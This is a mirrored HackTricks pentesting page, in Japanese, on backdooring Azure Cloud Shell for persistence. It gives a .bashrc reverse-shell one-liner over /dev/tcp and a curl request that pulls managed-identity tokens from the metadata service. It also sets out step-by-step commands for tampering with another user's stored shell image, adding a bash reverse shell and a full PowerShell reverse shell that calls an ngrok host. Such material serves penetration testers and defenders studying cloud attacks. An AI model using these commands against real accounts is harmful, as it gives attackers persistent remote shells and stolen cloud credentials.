gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-30 14:40:37 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
a547ba317edf27ed5f9e007be5831572f3571bd8
hacktricks-cloud/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md

3.5 KiB
Raw Blame History

Az - Cloud Shell Persistence

{{#include ../../../banners/hacktricks-training.md}}

Cloud Shell Persistence

Azure Cloud Shellは、永続ストレージと自動認証を備えたAzureリソースを管理するためのコマンドラインアクセスを提供します。攻撃者は、永続的なホームディレクトリにバックドアを配置することでこれを悪用できます

  • Persistent Storage: Azure Cloud ShellのホームディレクトリはAzureファイル共有にマウントされており、セッションが終了してもそのまま保持されます。
  • Startup Scripts: .bashrcconfig/PowerShell/Microsoft.PowerShell_profile.ps1のようなファイルは、各セッションの開始時に自動的に実行され、クラウドシェルが起動する際に永続的な実行を可能にします。

Example backdoor in .bashrc:

echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc

このバックドアは、ユーザーによってクラウドシェルが終了した後でも、5分間コマンドを実行できます。

さらに、インスタンスの詳細とトークンのためにAzureのメタデータサービスをクエリします:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s

Cloud Shell フィッシング

もし攻撃者がストレージアカウントに書き込みおよび読み取りアクセス権を持つ他のユーザーのイメージを見つけた場合、彼はそのイメージをダウンロードし、bashおよびPSバックドアを追加し、再びストレージアカウントにアップロードすることができるので、次回ユーザーがシェルにアクセスすると、コマンドが自動的に実行される

  • イメージをダウンロードし、バックドアを追加してアップロードする:
# Download image
mkdir /tmp/phishing_img
az storage file download-batch -d /tmp/phishing_img --account-name <acc-name> -s <file-share>

# Mount the image
mkdir /tmp/backdoor_img
sudo mount ./.cloudconsole/acc_carlos.img /tmp/backdoor_img
cd /tmp/backdoor_img

# Create backdoor
mkdir .config
mkdir .config/PowerShell
touch .config/PowerShell/Microsoft.PowerShell_profile.ps1
chmod 777 .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Bash backdoor
echo '(nohup /usr/bin/env /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/${SERVER}/${PORT} 0>&1 &)' >> .bashrc

# PS backdoor
echo '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19838);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' >> .config/PowerShell/Microsoft.PowerShell_profile.ps1

# Unmount
cd /tmp
sudo umount /tmp/backdoor_img

# Upload image
az storage file upload --account-name <acc-name> --path ".cloudconsole/acc_username.img" --source "./tmp/phishing_img/.cloudconsole/acc_username.img" -s <file-share>

{{#include ../../../banners/hacktricks-training.md}}

Reference in New Issue View Git Blame Copy Permalink